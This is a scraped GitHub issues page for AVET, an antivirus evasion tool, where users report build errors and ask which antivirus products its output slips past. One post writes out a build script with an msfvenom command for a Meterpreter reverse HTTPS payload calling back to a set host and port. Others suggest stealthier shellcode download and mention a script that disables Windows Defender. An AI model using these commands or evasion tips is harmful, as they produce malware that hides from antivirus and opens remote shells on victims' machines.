govolution / avet Goto Github PK

Hi,
first of all I would like to thank you for awesome work!

Is there any option to compile the final binary in "no window" mode? I've tried multiple ways how to achieve that, but with no success. Everytime I launch created binary, I can see application window hanging in the system....

Tested on Windows 7, Windows 8.1, Windows 10

Thank you for response.

Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 621 (iteration=0)
x86/shikata_ga_nai succeeded with size 648 (iteration=1)
x86/shikata_ga_nai succeeded with size 675 (iteration=2)
x86/shikata_ga_nai chosen with final size 675
Payload size: 675 bytes
Final size of c file: 2859 bytes
./format.sh: line 2: ./sh_format: cannot execute binary file: Exec format error
tr: warning: an unescaped backslash at end of string is not portable
./build/build_win32_meterpreter_rev_https_shikata_fopen.sh: line 13: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in

Hey below are the options I set

cat banner.txt
. build/global_win32.sh
. build/feature_construction.sh
. build/global_connect_config.sh
LPORT=443
LHOST=192.168.0.103
msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -b '\x00' -f raw -a x86 --platform Windows > output/thepayload.bin
set_command_source no_data
set_command_exec no_command
set_payload_source download_socket
set_decoder none
set_key_source no_data
set_payload_info_source no_data
set_payload_execution_method exec_shellcode
enable_debug_print
$win32_compiler -o output/output.exe source/avet.c -lwsock32 -lWs2_32
strip output/output.exe
cleanup_techniques

I have changed the compiler in "build/global_win32.sh" and set it to mingw cross compiler.

how can we use custom exe in Avet??

There is nothing in the avet folder !!!!!!

I know its not a script issue. But i cant fix the error.```
write shellcode from sc.txt to defs.h
err:module:import_dll Library libmingwex-0.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libisl-15.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libmpc-3.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:import_dll Library libmpfr-4.dll (which is needed by L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe") not found
err:module:LdrInitializeThunk Main exe initialization for L"C:\MinGW\libexec\gcc\mingw32\6.3.0\cc1.exe" failed, status c0000135

I created the sh.txt file using msfvenom, but when I run the ./format.sh script I get the following error:

I used Kali 2.0 and installed tdm-gcc per instructions.

Thanks,

Hello,

I've been trying your tools and I kept it simple, using default options.
It seems that most payload are not running (Windows 7) except for the bind ones that seems to be fine.

I created a new executable with AVET and meterpreter reverse TCP payload and while AVG scans the file and finds nothing, as soon as I execute the file AVG catches it (I believe it is scanning it in memory).
Which AVs did you test this against?

/avet# ./build/build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh -h
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of c file: 1764 bytes
./format.sh: line 2: ./sh_format: cannot execute binary file: Exec format error
tr: warning: an unescaped backslash at end of string is not portable

|\ __ |\ \ / /|\ ___ |___ \
\ \ |\ \ \ \ / / | \ /| \ _|
\ \ __ \ \ / / / \ \ _|/ \ \ \
\ \ \ \ \ \ / / \ \ _|\ \ \ \ \
\ _\ _\ _/ / \ _\ \ _
||||||/ |_______| ||

Anti Virus Evasion Make Tool by Daniel Sauder
use -h for help

write shellcode from scclean.txt to defs.h

Can we only use payloads created with metasploit?

Would it be a problem if we use another payload developed in C ++?

Hello

Error :
gcc.exe : error CreateProcess: No such file or directory

#consoleCommande: Wine gcc work.

PATH on wine cfg was modified.

I don't know what is the problem....

First of all, thanks to release this work on a public repository.

Nonetheless, this repo doesn't have any concrete license (or it isn't easy to see), so I would like that you consider to choose one to avoid the confusion that it causes with its absence, the work has applied the default copyright laws which the most of the people we aren't sure the implications because we aren't lawyers.

This page may help you to decide which one is more convenient for you and all the benefits that an open license has over a closed one, however, don't get me wrong, choose the one that fits better to your specific case, independently if it's open or not.

Thanks for considering.

Using latest version of Avast (as of 20171213), Avast immediately caught it as Win64:Malware-gen. Detected by the File Shield module

Payload was build using the instruction included in Example 1 of the README

what ?

So I used that bash script from Example 1, compiled it with mingw, and when I open exe on my VM, I get appcrash.

hi i use Example 1 but i get error
./build/build_win32_meterpreter_rev_https_20xshikata.sh
Found 1 compatible encoders
Attempting to encode payload with 20 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 489 (iteration=0)
x86/shikata_ga_nai succeeded with size 516 (iteration=1)
x86/shikata_ga_nai succeeded with size 543 (iteration=2)
x86/shikata_ga_nai succeeded with size 570 (iteration=3)
x86/shikata_ga_nai succeeded with size 597 (iteration=4)
x86/shikata_ga_nai succeeded with size 624 (iteration=5)
x86/shikata_ga_nai succeeded with size 651 (iteration=6)
x86/shikata_ga_nai succeeded with size 678 (iteration=7)
x86/shikata_ga_nai succeeded with size 705 (iteration=8)
x86/shikata_ga_nai succeeded with size 732 (iteration=9)
x86/shikata_ga_nai succeeded with size 759 (iteration=10)
x86/shikata_ga_nai succeeded with size 786 (iteration=11)
x86/shikata_ga_nai succeeded with size 813 (iteration=12)
x86/shikata_ga_nai succeeded with size 840 (iteration=13)
x86/shikata_ga_nai succeeded with size 867 (iteration=14)
x86/shikata_ga_nai succeeded with size 894 (iteration=15)
x86/shikata_ga_nai succeeded with size 921 (iteration=16)
x86/shikata_ga_nai succeeded with size 948 (iteration=17)
x86/shikata_ga_nai succeeded with size 975 (iteration=18)
x86/shikata_ga_nai succeeded with size 1002 (iteration=19)
x86/shikata_ga_nai chosen with final size 1002
Payload size: 1002 bytes
Final size of c file: 4233 bytes
./build/build_win32_meterpreter_rev_https_20xshikata.sh: line 10: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in
what to do ?

os: kali rolling 32bit

I am curious why have you decided to download the shellcode via internet explorer, when a way more stealthier approach would be to download it with libcurl and avoid opening IE.

Hey there!

I found your project and thought it was a super cool and impressive endeavor. I'm playing with the AVET framework on a couple VM's, but the only *win64 script I've tried that works according to the comments in the corresponding script is the "build_disablewindefpsh_xorfromcmd_revhttps_win64.sh". I was wondering when the last date these were tested and what the probability is that the brokenness is from commands and techniques that are outdated instead of an operator error.

I am more than willing to accept I am doing something wrong, but I've been wrestling with it all morning, and I can't seem to find a solution that doesn't have me doing some editing beyond variable/payload replacement int the avet source.

P.S. I have Windows Defender off just to see if I can get the payload to run as expected before I check the AV evasion aspect.

thanks for your effort , every thing run well but there's no reverse connection when i try win64 payload
the payload working on win10 and evade the antivirus except kaspersky but the main problem only there's no reverse connection